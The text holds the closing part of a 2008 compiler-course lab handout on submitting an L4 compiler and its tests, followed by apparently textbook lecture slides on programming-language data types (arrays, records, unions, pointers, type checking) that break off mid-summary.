a time-out (14). All test files should be collected into a directory `test/` (containing no other files) and submitted via the Autolab server. Your test programs must test the new features of \textit{L4}: structs, pointers, and arrays. Since the language is backward compatible except for conflicts with reserved words, we may also use the \textit{L3} test cases for regression testing. We cannot test programs whose results are undefined. It is therefore critical that your test programs do not perform any operations whose meaning is undefined. This includes accessing an array out of bounds or accessing a null array. We would like some fraction of your test programs to compute “interesting” functions; please briefly describe such examples in a comment in the file. Disallowed are sorting programs. \textbf{Compiler Files} The files comprising the compiler itself should be collected in a directory \texttt{compiler/} which should contain a \texttt{Makefile}. \textbf{Important:} You should also update the \texttt{README} file and insert a description of your code and algorithms used at the beginning of this file. This will be a crucial guide for the grader. Issuing the shell command \begin{verbatim} % make l4c \end{verbatim} should generate the appropriate files so that \begin{verbatim} % bin/l4c <args> \end{verbatim} will run your \textit{L4} compiler. The command \begin{verbatim} % make clean \end{verbatim} should remove all binaries, heaps, and other generated files. \textbf{Using the Subversion Repository} The recommended method for handout and handin is the course subversion repository. The handout files for this course can be checked out from our subversion repository via \begin{verbatim} % svn checkout https://cvs.concert.cs.cmu.edu/15-411/<team> \end{verbatim} where \texttt{<team>} is the name of your team. You will find materials for this lab in the \texttt{lab4} subdirectory. Or, if you have checked out \texttt{15-411/<team>} directory before, you can issue the command \texttt{svn update} in that directory. After first adding (with \texttt{svn add} or \texttt{svn copy} from a previous lab) and committing your handin directory (with \texttt{svn commit}) to the repository you can hand in your tests or compiler by selecting \texttt{S5b - Autograde your code in svn repository} from the Autolab server menu. It will perform one of \begin{verbatim} % svn checkout https://cvs.concert.cs.cmu.edu/15-411/<team>/lab4/tests % svn checkout https://cvs.concert.cs.cmu.edu/15-411/<team>/lab4/compiler \end{verbatim} to obtain the files directories to autograde, depending on whether you are handing in your test files or your compiler. If you are submitting multiple versions, please remember to commit your changes to the repository before asking the Autolab server to grade them! And please do not include an compiled files or binaries in the repository! Uploading tar Archives A deprecated method for handout and handin is the download and upload of tar archives from the Autolab server. For the test cases, bundle the directory tests as a tar file tests.tar with % tar -cvf tests.tar tests/ to be submitted via the Autolab server. For the compiler, bundle the directory compiler as a tar file compiler.tar. In order to keep the files you hand in to a reasonable size, please clean up the directory and then bundle it as a tar file. For example: % cd compiler % make clean % cd .. % tar -cvf compiler.tar --exclude CVS compiler/ to be submitted via the Autolab server. Please do not include any compiled files or binaries in your hand-in file! What to Turn In Hand-in on the Autolab server: - At least 20 test cases, at least two of which generate as error and at least two others raise a runtime exception. The directory tests/ should only contain your test files and be submitted via subversion or as a tar file as described above. The server will test your test files and notify you if there is a discrepancy between your answer and the outcome of the reference implementation. You may hand in as many times as you like before the deadline without penalty. If you feel the reference implementation is in error, please notify the instructors. The compiled binary for each test case should run in 2 seconds with the reference compiler on the lab machines; we will use a 5 second limit for testing compilers. Test cases are due 11:59pm on Tue Oct 21, 2008. - The complete compiler. The directory compiler/ should contain only the sources for your compiler and be submitted via subversion or as a tar file as described above. The Autolab server will build your compiler, run it on all extant test files, link the resulting assembly files against our runtime system (if compilation is successful), execute the binaries (each with a 5 second time limit), and finally compare the actual with the expected results. You may hand in as many times as you like before the deadline without penalty. Compilers are due 11:59pm on Tue Oct 28, 2008. 6 Notes and Hints There is no address-of operator (&), and variables (be it local variables or procedure parameters) cannot hold large values. The suggested implementation therefore is to allocate structs and arrays on the heap. Our runtime system provides the function `void* calloc(size_t nobj, size_t nbytes);` for this purpose, which allocates an array of `nobj` objects of size `nbytes` all initialized to 0. Your assembly code should call this function as necessary, assuming `size_t` is `unsigned int` (4 bytes). There is no corresponding `free`, since we use a conservative garbage collector to reclaim storage. To check that struct declarations are well-founded, we suggest a simple cycle-checking depth-first search which is in any case necessary to compute field offsets. Global tables to keep struct sizes, field offsets, and the types of functions seem like an appropriate strategy. Data now can have different sizes, and you need to track this information throughout the various phases of compilation. We suggest you read Section 4 of the Bryant/O’Hallaron note on x86-64 Machine-Level Programming available from the Resources page, especially the paragraph on move instructions and the effects of 32 bit operators in the upper 32 of the 64 bit registers. Your code must strictly adhere to the struct alignment requirements explained above. You may also read the Section 3.1.2 in the Application Binary Interface description available from the Resources page. Also, the C calling conventions detailed in Lab 3 must still be obeyed. Since no large values can be passed, this remains relatively straightforward. Also as in Lab 3, functions declared with `extern` must retain their name, while all defined functions `g` must be exported as symbols `_l4_g`. This prevents any conflicts between a C standard library function and the L4 name of a function. When a function `_l4_g` is declared with `extern`, there may not be a local function `g` to avoid ambiguity. ### Run-time Environment The tests will be run in the standard Linux environment on the lab machines; the produced assembly code must conform to those standards. We recommend the use of `gcc -S` to produce assembly files from C sources which can provide template code and assembly language examples. We will link your code against some library functions you can find in the files `runtime/l4rt.h` and `runtime/l4rt.c`. This will allow us to test your adherence to the C calling conventions on the x86-64 architecture, and it will allow you to call some standard library functions, say, to print messages, painful though it may be in a language without strings. The functions we explicitly define can be declared in L4 as ```c extern int printchar(c:int); /* print c as ASCII character */ extern int printint(n:int); /* print n in decimal */ extern int printhex(n:int); /* print n in hexadecimal */ ``` More may be available as the code is released and updated. If your compiler detects any (compile-time) errors in the source program, it should exit with a non-zero return code. If compilation succeeds and target code is generated, the compiler should then exit with a return code of 0. ### 7 Changes **Revision 1.** The compiler must check that any external symbol `_l4_g` must not conflict with an internal function `g`. This prevents confusion between the two symbols while permitting multiple L4 files to be linked. Revision 2. The type checker must reject *NULL because it can have any type, which leads to problems in type checking. So, for example, (**NULL)**.f might have been legal in the first spec, but type checking is unreasonable since multiple structs may have an f field. The new restriction can be checked, for example, by verifying that in e, the expression e does not have type any*.
{"Source-Url": "http://www.cs.cmu.edu/afs/cs.cmu.edu/user/fp/www/courses/15411-f08/misc/lab4.pdf", "len_cl100k_base": 6369, "olmocr-version": "0.1.49", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 35246, "total-output-tokens": 7086, "length": "2e12", "weborganizer": {"__label__adult": 0.00039267539978027344, "__label__art_design": 0.0003066062927246094, "__label__crime_law": 0.0002205371856689453, "__label__education_jobs": 0.0014104843139648438, "__label__entertainment": 6.335973739624023e-05, "__label__fashion_beauty": 0.00016069412231445312, "__label__finance_business": 0.00016963481903076172, "__label__food_dining": 0.00047135353088378906, "__label__games": 0.0005402565002441406, "__label__hardware": 0.0012559890747070312, "__label__health": 0.00028133392333984375, "__label__history": 0.0002092123031616211, "__label__home_hobbies": 0.00013303756713867188, "__label__industrial": 0.00054168701171875, "__label__literature": 0.00027942657470703125, "__label__politics": 0.00019788742065429688, "__label__religion": 0.00048232078552246094, "__label__science_tech": 0.00627899169921875, "__label__social_life": 0.00010603666305541992, "__label__software": 0.0030193328857421875, "__label__software_dev": 0.982421875, "__label__sports_fitness": 0.00029206275939941406, "__label__transportation": 0.000675201416015625, "__label__travel": 0.00022411346435546875}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 25872, 0.01147]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 25872, 0.42772]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 25872, 0.87206]], "google_gemma-3-12b-it_contains_pii": [[0, 1683, false], [1683, 1874, null], [1874, 3377, null], [3377, 6753, null], [6753, 9499, null], [9499, 12009, null], [12009, 14476, null], [14476, 17221, null], [17221, 19985, null], [19985, 22298, null], [22298, 25490, null], [25490, 25872, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1683, true], [1683, 1874, null], [1874, 3377, null], [3377, 6753, null], [6753, 9499, null], [9499, 12009, null], [12009, 14476, null], [14476, 17221, null], [17221, 19985, null], [19985, 22298, null], [22298, 25490, null], [25490, 25872, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 25872, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 25872, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 25872, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 25872, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 25872, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 25872, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 25872, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 25872, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 25872, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 25872, null]], "pdf_page_numbers": [[0, 1683, 1], [1683, 1874, 2], [1874, 3377, 3], [3377, 6753, 4], [6753, 9499, 5], [9499, 12009, 6], [12009, 14476, 7], [14476, 17221, 8], [17221, 19985, 9], [19985, 22298, 10], [22298, 25490, 11], [25490, 25872, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 25872, 0.00457]]}
olmocr_science_pdfs
2024-11-24
2024-11-24
06baab034eb15a19f3dd10212101b7ffbba53d09
Chapter 6 Data Types Chapter 6 Topics • Introduction • Primitive Data Types • Character String Types • User-Defined Ordinal Types • Array Types • Associative Arrays • Record Types • Tuple Types • List Types • Union Types • Pointer and Reference Types • Type Checking • Strong Typing • Type Equivalence • Theory and Data Types Introduction - A *data type* defines a collection of data objects and a set of predefined operations on those objects - A *descriptor* is the collection of the attributes of a variable - An *object* represents an instance of a user-defined (abstract data) type - One design issue for all data types: What operations are defined and how are they specified? Primitive Data Types • Almost all programming languages provide a set of *primitive data types* • Primitive data types: Those not defined in terms of other data types • Some primitive data types are merely reflections of the hardware • Others require only a little non-hardware support for their implementation Primitive Data Types: Integer - Almost always an exact reflection of the hardware so the mapping is trivial - There may be as many as eight different integer types in a language - Java’s signed integer sizes: `byte`, `short`, `int`, `long` Primitive Data Types: Floating Point - Model real numbers, but only as approximations - Languages for scientific use support at least two floating-point types (e.g., `float` and `double`; sometimes more - Usually exactly like the hardware, but not always - IEEE Floating-Point Standard 754 Primitive Data Types: Complex - Some languages support a complex type, e.g., C99, Fortran, and Python - Each value consists of two floats, the real part and the imaginary part - Literal form (in Python): \[(7 + 3j)\], where 7 is the real part and 3 is the imaginary part Primitive Data Types: Decimal • For business applications (money) – Essential to COBOL – C# offers a decimal data type • Store a fixed number of decimal digits, in coded form (BCD) • Advantage: accuracy • Disadvantages: limited range, wastes memory Primitive Data Types: Boolean • Simplest of all • Range of values: two elements, one for “true” and one for “false” • Could be implemented as bits, but often as bytes – Advantage: readability Primitive Data Types: Character • Stored as numeric codings • Most commonly used coding: ASCII • An alternative, 16-bit coding: Unicode (UCS-2) – Includes characters from most natural languages – Originally used in Java – C# and JavaScript also support Unicode • 32-bit Unicode (UCS-4) – Supported by Fortran, starting with 2003 Character String Types • Values are sequences of characters • Design issues: – Is it a primitive type or just a special kind of array? – Should the length of strings be static or dynamic? Character String Types Operations • Typical operations: – Assignment and copying – Comparison (=, >, etc.) – Catenation – Substring reference – Pattern matching Character String Type in Certain Languages - **C and C++** - Not primitive - Use `char` arrays and a library of functions that provide operations - **SNOBOL4 (a string manipulation language)** - Primitive - Many operations, including elaborate pattern matching - **Fortran and Python** - Primitive type with assignment and several operations - **Java** - Primitive via the `String` class - **Perl, JavaScript, Ruby, and PHP** - Provide built-in pattern matching, using regular expressions Character String Length Options • Static: COBOL, Java’s String class • Limited Dynamic Length: C and C++ – In these languages, a special character is used to indicate the end of a string’s characters, rather than maintaining the length • Dynamic (no maximum): SNOBOL4, Perl, JavaScript • Ada supports all three string length options Character String Type Evaluation • Aid to writability • As a primitive type with static length, they are inexpensive to provide--why not have them? • Dynamic length is nice, but is it worth the expense? Character String Implementation - Static length: compile-time descriptor - Limited dynamic length: may need a run-time descriptor for length (but not in C and C++) - Dynamic length: need run-time descriptor; allocation/deallocation is the biggest implementation problem Compile- and Run-Time Descriptors <table> <thead> <tr> <th>Static string</th> <th>Limited dynamic string</th> </tr> </thead> <tbody> <tr> <td>Length</td> <td>Maximum length</td> </tr> <tr> <td>Address</td> <td>Current length</td> </tr> </tbody> </table> Compile-time descriptor for static strings Run-time descriptor for limited dynamic strings User-Defined Ordinal Types • An ordinal type is one in which the range of possible values can be easily associated with the set of positive integers • Examples of primitive ordinal types in Java – integer – char – boolean Enumeration Types • All possible values, which are named constants, are provided in the definition • C# example ```csharp enum days {mon, tue, wed, thu, fri, sat, sun}; ``` • Design issues – Is an enumeration constant allowed to appear in more than one type definition, and if so, how is the type of an occurrence of that constant checked? – Are enumeration values coerced to integer? – Any other type coerced to an enumeration type? Evaluation of Enumerated Type • Aid to readability, e.g., no need to code a color as a number • Aid to reliability, e.g., compiler can check: – operations (don’t allow colors to be added) – No enumeration variable can be assigned a value outside its defined range – Ada, C#, and Java 5.0 provide better support for enumeration than C++ because enumeration type variables in these languages are not coerced into integer types Subrange Types • An ordered contiguous subsequence of an ordinal type – Example: 12..18 is a subrange of integer type • Ada’s design ``` type Days is (mon, tue, wed, thu, fri, sat, sun); subtype Weekdays is Days range mon..fri; subtype Index is Integer range 1..100; Day1: Days; Day2: Weekday; Day2 := Day1; ``` Subrange Evaluation • Aid to readability – Make it clear to the readers that variables of subrange can store only certain range of values • Reliability – Assigning a value to a subrange variable that is outside the specified range is detected as an error Implementation of User-Defined Ordinal Types - Enumeration types are implemented as integers - Subrange types are implemented like the parent types with code inserted (by the compiler) to restrict assignments to subrange variables Array Types • An array is a homogeneous aggregate of data elements in which an individual element is identified by its position in the aggregate, relative to the first element. Array Design Issues - What types are legal for subscripts? - Are subscripting expressions in element references range checked? - When are subscript ranges bound? - When does allocation take place? - Are ragged or rectangular multidimensional arrays allowed, or both? - What is the maximum number of subscripts? - Can array objects be initialized? - Are any kind of slices supported? Array Indexing • *Indexing* (or subscripting) is a mapping from indices to elements \[ \text{array\_name (index\_value\_list)} \rightarrow \text{an element} \] • **Index Syntax** – Fortran and Ada use parentheses • Ada explicitly uses parentheses to show uniformity between array references and function calls because both are *mappings* – Most other languages use brackets Arrays Index (Subscript) Types - FORTRAN, C: integer only - Ada: integer or enumeration (includes Boolean and char) - Java: integer types only - Index range checking - C, C++, Perl, and Fortran do not specify range checking - Java, ML, C# specify range checking - In Ada, the default is to require range checking, but it can be turned off Subscript Binding and Array Categories - **Static**: subscript ranges are statically bound and storage allocation is static (before run-time) - Advantage: efficiency (no dynamic allocation) - **Fixed stack-dynamic**: subscript ranges are statically bound, but the allocation is done at declaration time - Advantage: space efficiency Subscript Binding and Array Categories (continued) - **Stack-dynamic**: subscript ranges are dynamically bound and the storage allocation is dynamic (done at run-time) - Advantage: flexibility (the size of an array need not be known until the array is to be used) - **Fixed heap-dynamic**: similar to fixed stack-dynamic: storage binding is dynamic but fixed after allocation (i.e., binding is done when requested and storage is allocated from heap, not stack) Subscript Binding and Array Categories (continued) • Heap-dynamic: binding of subscript ranges and storage allocation is dynamic and can change any number of times – Advantage: flexibility (arrays can grow or shrink during program execution) Subscript Binding and Array Categories (continued) • C and C++ arrays that include `static` modifier are static • C and C++ arrays without `static` modifier are fixed stack-dynamic • C and C++ provide fixed heap-dynamic arrays • C# includes a second array class `ArrayList` that provides fixed heap-dynamic • Perl, JavaScript, Python, and Ruby support heap-dynamic arrays Array Initialization - Some languages allow initialization at the time of storage allocation - C, C++, Java, C# example ``` int list [] = {4, 5, 7, 83} ``` - Character strings in C and C++ ``` char name [] = "freddie"; ``` - Arrays of strings in C and C++ ``` char *names [] = {"Bob", "Jake", "Joe"}; ``` - Java initialization of String objects ``` String[] names = {"Bob", "Jake", "Joe"}; ``` Heterogeneous Arrays • A *heterogeneous array* is one in which the elements need not be of the same type • Supported by Perl, Python, JavaScript, and Ruby Array Initialization • C-based languages - `int list [] = {1, 3, 5, 7}` - `char *names [] = {"Mike", "Fred", "Mary Lou"};` • Ada - `List : array (1..5) of Integer := (1 => 17, 3 => 34, others => 0);` • Python - `List comprehensions` ```python list = [x ** 2 for x in range(12) if x % 3 == 0] puts [0, 9, 36, 81] in list ``` Arrays Operations - APL provides the most powerful array processing operations for vectors and matrixes as well as unary operators (for example, to reverse column elements) - Ada allows array assignment but also catenation - Python’s array assignments, but they are only reference changes. Python also supports array catenation and element membership operations - Ruby also provides array catenation - Fortran provides *elemental* operations because they are between pairs of array elements - For example, + operator between two arrays results in an array of the sums of the element pairs of the two arrays Rectangular and Jagged Arrays • A rectangular array is a multi-dimensioned array in which all of the rows have the same number of elements and all columns have the same number of elements • A jagged matrix has rows with varying number of elements – Possible when multi-dimensioned arrays actually appear as arrays of arrays • C, C++, and Java support jagged arrays • Fortran, Ada, and C# support rectangular arrays (C# also supports jagged arrays) Slices • A slice is some substructure of an array; nothing more than a referencing mechanism • Slices are only useful in languages that have array operations Slice Examples • Python \[ \text{vector} = [2, 4, 6, 8, 10, 12, 14, 16] \\ \text{mat} = [[1, 2, 3], [4, 5, 6], [7, 8, 9]] \\ \] \text{vector (3:6) is a three-element array} \\ \text{mat[0][0:2] is the first and second element of the first row of mat} • Ruby supports slices with the \texttt{slice} method \text{list.slice(2, 2) returns the third and fourth elements of list} Implementation of Arrays • Access function maps subscript expressions to an address in the array • Access function for single-dimensioned arrays: \[ \text{address(list[k])} = \text{address (list[lower_bound])} + ((k - \text{lower_bound}) \times \text{element_size}) \] Accessing Multi-dimensioned Arrays • Two common ways: – Row major order (by rows) – used in most languages – Column major order (by columns) – used in Fortran – A compile-time descriptor for a multidimensional array Locating an Element in a Multi-dimensioned Array • General format \[ \text{Location } (a[i,j]) = \text{address of a}[\text{row}_{lb},\text{col}_{lb}] + ((i - \text{row}_{lb}) \times n) + (j - \text{col}_{lb})) \times \text{element}_{size} \] ## Compile-Time Descriptors <table> <thead> <tr> <th>Single-dimensioned array</th> <th>Multidimensional array</th> </tr> </thead> <tbody> <tr> <td><strong>Array</strong></td> <td><strong>Multidimensioned array</strong></td> </tr> <tr> <td>Element type</td> <td>Element type</td> </tr> <tr> <td>Index type</td> <td>Index type</td> </tr> <tr> <td>Index lower bound</td> <td>Number of dimensions</td> </tr> <tr> <td>Index upper bound</td> <td></td> </tr> <tr> <td>Address</td> <td></td> </tr> </tbody> </table> - **Index range 1** - \::: - **Index range n** - **Address** Associative Arrays • An *associative array* is an unordered collection of data elements that are indexed by an equal number of values called *keys* – User-defined keys must be stored • Design issues: - What is the form of references to elements? - Is the size static or dynamic? • Built-in type in Perl, Python, Ruby, and Lua – In Lua, they are supported by tables Associative Arrays in Perl • Names begin with %; literals are delimited by parentheses ```perl %hi_temps = ("Mon" => 77, "Tue" => 79, "Wed" => 65, ...); ``` • Subscripting is done using braces and keys ```perl $hi_temps{"Wed"} = 83; ``` – Elements can be removed with delete ```perl delete $hi_temps{"Tue"}; ``` Record Types - A *record* is a possibly heterogeneous aggregate of data elements in which the individual elements are identified by names. - Design issues: - What is the syntactic form of references to the field? - Are elliptical references allowed? Definition of Records in COBOL • COBOL uses level numbers to show nested records; others use recursive definition 01 EMP-REC. 02 EMP-NAME. 05 FIRST PIC X(20). 05 MID PIC X(10). 05 LAST PIC X(20). 02 HOURLY-RATE PIC 99V99. Definition of Records in Ada • Record structures are indicated in an orthogonal way ```ada type Emp_Rec_Type is record First: String (1..20); Mid: String (1..10); Last: String (1..20); Hourly_Rate: Float; end record; Emp_Rec: Emp_Rec_Type; ``` References to Records • Record field references 1. COBOL field_name OF record_name_1 OF ... OF record_name_n 2. Others (dot notation) record_name_1.record_name_2. ... record_name_n.field_name • Fully qualified references must include all record names • Elliptical references allow leaving out record names as long as the reference is unambiguous, for example in COBOL FIRST, FIRST OF EMP-NAME, and FIRST of EMP-REC are elliptical references to the employee’s first name Operations on Records • Assignment is very common if the types are identical • Ada allows record comparison • Ada records can be initialized with aggregate literals • COBOL provides MOVE CORRESPONDING – Copies a field of the source record to the corresponding field in the target record Evaluation and Comparison to Arrays • Records are used when collection of data values is heterogeneous • Access to array elements is much slower than access to record fields, because subscripts are dynamic (field names are static) • Dynamic subscripts could be used with record field access, but it would disallow type checking and it would be much slower Implementation of Record Type Offset address relative to the beginning of the records is associated with each field <table> <thead> <tr> <th>Field 1</th> <th>Field n</th> </tr> </thead> <tbody> <tr> <td>Record</td> <td>Record</td> </tr> <tr> <td>Name</td> <td>Name</td> </tr> <tr> <td>Type</td> <td>Type</td> </tr> <tr> <td>Offset</td> <td>Offset</td> </tr> <tr> <td></td> <td>Name</td> </tr> <tr> <td></td> <td>Type</td> </tr> <tr> <td></td> <td>Offset</td> </tr> <tr> <td></td> <td>Address</td> </tr> </tbody> </table> Tuple Types • A tuple is a data type that is similar to a record, except that the elements are not named • Used in Python, ML, and F# to allow functions to return multiple values – Python • Closely related to its lists, but immutable • Create with a tuple literal myTuple = (3, 5.8, 'apple') Referenced with subscripts (begin at 1) Catenation with + and deleted with del Tuple Types (continued) - ML ```ml val myTuple = (3, 5.8, 'apple'); ``` - Access as follows: ```ml #1(myTuple) is the first element ``` - A new tuple type can be defined ```ml type intReal = int * real; ``` - F# ```fsharp let tup = (3, 5, 7) ``` ```fsharp let a, b, c = tup ``` This assigns a tuple to a tuple pattern `(a, b, c)` List Types • Lists in LISP and Scheme are delimited by parentheses and use no commas (A B C D) and (A (B C) D) • Data and code have the same form As data, (A B C) is literally what it is As code, (A B C) is the function A applied to the parameters B and C • The interpreter needs to know which a list is, so if it is data, we quote it with an apostrophe ’ (A B C) is data List Types (continued) - **List Operations in Scheme** - **CAR** returns the first element of its list parameter (CAR '(A B C)) returns A - **CDR** returns the remainder of its list parameter after the first element has been removed (CDR '(A B C)) returns (B C) - **CONS** puts its first parameter into its second parameter, a list, to make a new list (CONS 'A (B C)) returns (A B C) - **LIST** returns a new list of its parameters (LIST 'A 'B '(C D)) returns (A B (C D)) List Types (continued) • List Operations in ML – Lists are written in brackets and the elements are separated by commas – List elements must be of the same type – The Scheme \texttt{CONS} function is a binary operator in ML, :: 3 :: [5, 7, 9] evaluates to [3, 5, 7, 9] – The Scheme \texttt{CAR} and \texttt{CDR} functions are named \texttt{hd} and \texttt{tl}, respectively List Types (continued) • F# Lists – Like those of ML, except elements are separated by semicolons and \texttt{hd} and \texttt{tl} are methods of the \texttt{List} class • Python Lists – The list data type also serves as Python’s arrays – Unlike Scheme, Common LISP, ML, and F#, Python’s lists are mutable – Elements can be of any type – Create a list with an assignment \texttt{myList = \{3, 5.8, "grape"\]} List Types (continued) - Python Lists (continued) - List elements are referenced with subscripting, with indices beginning at zero \[ x = \text{myList}[1] \quad \text{Sets} \ x \ \text{to} \ 5.8 \] - List elements can be deleted with `del` \[ \text{del myList}[1] \] - List Comprehensions – derived from set notation \[ [x * x \ \text{for} \ x \ \text{in} \ \text{range}(6) \ \text{if} \ x \ % \ 3 == 0] \] \text{range}(12) \ \text{creates} \ [0, 1, 2, 3, 4, 5, 6] \text{Constructed list:} \ [0, 9, 36] List Types (continued) - Haskell’s List Comprehensions - The original \[ [n \times n \mid n \leftarrow [1..10]] \] - F#’s List Comprehensions ```fsharp let myArray = [|for i in 1 .. 5 -> i * i|] ``` - Both C# and Java supports lists through their generic heap-dynamic collection classes, List and ArrayList, respectively Unions Types • A *union* is a type whose variables are allowed to store different type values at different times during execution • Design issues – Should type checking be required? – Should unions be embedded in records? Discriminated vs. Free Unions • Fortran, C, and C++ provide union constructs in which there is no language support for type checking; the union in these languages is called *free union* • Type checking of unions require that each union include a type indicator called a *discriminant* – Supported by Ada Ada Union Types ```ada type Shape is (Circle, Triangle, Rectangle); type Colors is (Red, Green, Blue); type Figure (Form: Shape) is record Filled: Boolean; Color: Colors; case Form is when Circle => Diameter: Float; when Triangle => Leftside, Rightside: Integer; Angle: Float; when Rectangle => Side1, Side2: Integer; end case; end record; ``` Ada Union Type Illustrated A discriminated union of three shape variables Implementation of Unions type Node (Tag : Boolean) is record case Tag is when True => Count : Integer; when False => Sum : Float; end case; end record; Evaluation of Unions • Free unions are unsafe – Do not allow type checking • Java and C# do not support unions – Reflective of growing concerns for safety in programming language • Ada’s discriminated unions are safe Pointer and Reference Types • A *pointer* type variable has a range of values that consists of memory addresses and a special value, *nil* • Provide the power of indirect addressing • Provide a way to manage dynamic memory • A pointer can be used to access a location in the area where storage is dynamically created (usually called a *heap*) Design Issues of Pointers • What are the scope of and lifetime of a pointer variable? • What is the lifetime of a heap-dynamic variable? • Are pointers restricted as to the type of value to which they can point? • Are pointers used for dynamic storage management, indirect addressing, or both? • Should the language support pointer types, reference types, or both? Pointer Operations • Two fundamental operations: assignment and dereferencing • Assignment is used to set a pointer variable’s value to some useful address • Dereferencing yields the value stored at the location represented by the pointer’s value – Dereferencing can be explicit or implicit – C++ uses an explicit operation via * \[ j = *ptr \] sets \( j \) to the value located at \( ptr \) Pointer Assignment Illustrated The assignment operation \( j = *\text{ptr} \) Problems with Pointers • Dangling pointers (dangerous) – A pointer points to a heap-dynamic variable that has been deallocated • Lost heap-dynamic variable – An allocated heap-dynamic variable that is no longer accessible to the user program (often called garbage) • Pointer p1 is set to point to a newly created heap-dynamic variable • Pointer p1 is later set to point to another newly created heap-dynamic variable • The process of losing heap-dynamic variables is called memory leakage Pointers in Ada • Some dangling pointers are disallowed because dynamic objects can be automatically deallocated at the end of pointer's type scope • The lost heap-dynamic variable problem is not eliminated by Ada (possible with UNCHECKED_DEALLOCATION) Pointers in C and C++ • Extremely flexible but must be used with care • Pointers can point at any variable regardless of when or where it was allocated • Used for dynamic storage management and addressing • Pointer arithmetic is possible • Explicit dereferencing and address-of operators • Domain type need not be fixed (void *) void * can point to any type and can be type checked (cannot be de-referenced) Pointer Arithmetic in C and C++ ```c float stuff[100]; float *p; p = stuff; *(p+5) is equivalent to stuff[5] and p[5] *(p+i) is equivalent to stuff[i] and p[i] ``` Reference Types • C++ includes a special kind of pointer type called a reference type that is used primarily for formal parameters – Advantages of both pass-by-reference and pass-by-value • Java extends C++’s reference variables and allows them to replace pointers entirely – References are references to objects, rather than being addresses • C# includes both the references of Java and the pointers of C++ Evaluation of Pointers • Dangling pointers and dangling objects are problems as is heap management • Pointers are like goto's--they widen the range of cells that can be accessed by a variable • Pointers or references are necessary for dynamic data structures--so we can't design a language without them Representations of Pointers • Large computers use single values • Intel microprocessors use segment and offset Dangling Pointer Problem • *Tombstone*: extra heap cell that is a pointer to the heap-dynamic variable – The actual pointer variable points only at tombstones – When heap-dynamic variable de-allocated, tombstone remains but set to nil – Costly in time and space . *Locks-and-keys*: Pointer values are represented as (key, address) pairs – Heap-dynamic variables are represented as variable plus cell for integer lock value – When heap-dynamic variable allocated, lock value is created and placed in lock cell and key cell of pointer Heap Management • A very complex run-time process • Single-size cells vs. variable-size cells • Two approaches to reclaim garbage – Reference counters (*eager approach*): reclamation is gradual – Mark-sweep (*lazy approach*): reclamation occurs when the list of variable space becomes empty Reference Counter • Reference counters: maintain a counter in every cell that store the number of pointers currently pointing at the cell – Disadvantages: space required, execution time required, complications for cells connected circularly – Advantage: it is intrinsically incremental, so significant delays in the application execution are avoided Mark-Sweep • The run-time system allocates storage cells as requested and disconnects pointers from cells as necessary; mark-sweep then begins – Every heap cell has an extra bit used by collection algorithm – All cells initially set to garbage – All pointers traced into heap, and reachable cells marked as not garbage – All garbage cells returned to list of available cells – Disadvantages: in its original form, it was done too infrequently. When done, it caused significant delays in application execution. Contemporary mark-sweep algorithms avoid this by doing it more often—called incremental mark-sweep Marking Algorithm Dashed lines show the order of node_marking Variable-Size Cells • All the difficulties of single-size cells plus more • Required by most programming languages • If mark-sweep is used, additional problems occur – The initial setting of the indicators of all cells in the heap is difficult – The marking process in nontrivial – Maintaining the list of available space is another source of overhead Type Checking • Generalize the concept of operands and operators to include subprograms and assignments • *Type checking* is the activity of ensuring that the operands of an operator are of compatible types • A *compatible type* is one that is either legal for the operator, or is allowed under language rules to be implicitly converted, by compiler-generated code, to a legal type – This automatic conversion is called a *coercion*. • A *type error* is the application of an operator to an operand of an inappropriate type Type Checking (continued) - If all type bindings are static, nearly all type checking can be static. - If type bindings are dynamic, type checking must be dynamic. - A programming language is *strongly typed* if type errors are always detected. - **Advantage of strong typing**: allows the detection of the misuses of variables that result in type errors. Strong Typing Language examples: – C and C++ are not: parameter type checking can be avoided; unions are not type checked – Ada is, almost *(UNCHECKED CONVERSION is loophole)* (Java and C# are similar to Ada) Strong Typing (continued) • Coercion rules strongly affect strong typing—they can weaken it considerably (C++ versus Ada) • Although Java has just half the assignment coercions of C++, its strong typing is still far less effective than that of Ada Name Type Equivalence - *Name type equivalence* means the two variables have equivalent types if they are in either the same declaration or in declarations that use the same type name. - Easy to implement but highly restrictive: - Subranges of integer types are not equivalent with integer types. - Formal parameters must be the same type as their corresponding actual parameters. Structure Type Equivalence - *Structure type equivalence* means that two variables have equivalent types if their types have identical structures - More flexible, but harder to implement Type Equivalence (continued) • Consider the problem of two structured types: – Are two record types equivalent if they are structurally the same but use different field names? – Are two array types equivalent if they are the same except that the subscripts are different? (e.g. [1..10] and [0..9]) – Are two enumeration types equivalent if their components are spelled differently? – With structural type equivalence, you cannot differentiate between types of the same structure (e.g. different units of speed, both float) Theory and Data Types • Type theory is a broad area of study in mathematics, logic, computer science, and philosophy • Two branches of type theory in computer science: – Practical – data types in commercial languages – Abstract – typed lambda calculus • A type system is a set of types and the rules that govern their use in programs Theory and Data Types (continued) • Formal model of a type system is a set of types and a collection of functions that define the type rules – Either an attribute grammar or a type map could be used for the functions – Finite mappings – model arrays and functions – Cartesian products – model tuples and records – Set unions – model union types – Subsets – model subtypes Summary • The data types of a language are a large part of what determines that language’s style and usefulness • The primitive data types of most imperative languages include numeric, character, and Boolean types • The user-defined enumeration and subrange 